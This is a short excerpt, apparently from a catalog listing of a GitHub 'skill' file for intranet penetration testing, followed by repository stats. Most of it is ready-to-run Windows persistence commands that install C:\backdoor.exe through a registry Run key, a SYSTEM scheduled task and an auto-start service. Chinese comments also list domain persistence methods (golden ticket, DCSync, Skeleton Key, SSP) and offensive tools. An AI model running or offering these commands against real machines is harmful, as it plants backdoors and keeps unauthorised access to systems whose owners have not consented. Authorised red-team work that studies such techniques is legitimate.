reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v backdoor /d "C:\backdoor.exe" /f
schtasks /create /tn backdoor /tr C:\backdoor.exe /sc onlogon /ru SYSTEM /f
# 服务持久化(删除普通用户访问权限)
sc create backdoor binPath= C:\backdoor.exe start= auto
# 系统态: 服务/驱动(以SYSTEM权限,隐蔽)
# 域持久化: 黄金票据 / 域管账户克隆(ACL DCSync) / Skeleton Key / SSP
# 工具: SharpPersist / PoshC2持久化模块 / 内存马(Web场景)
Shortened here. Read the whole file on GitHub.
Signals
- GitHub stars
- 115
- Forks
- 4
- Last commit
- Sep 2026
Advanced
- Catalog kind
- skill
- Gateway key
intranet-penetration-testing- Source
- github.com/langbyyi/cyberstrikeai-src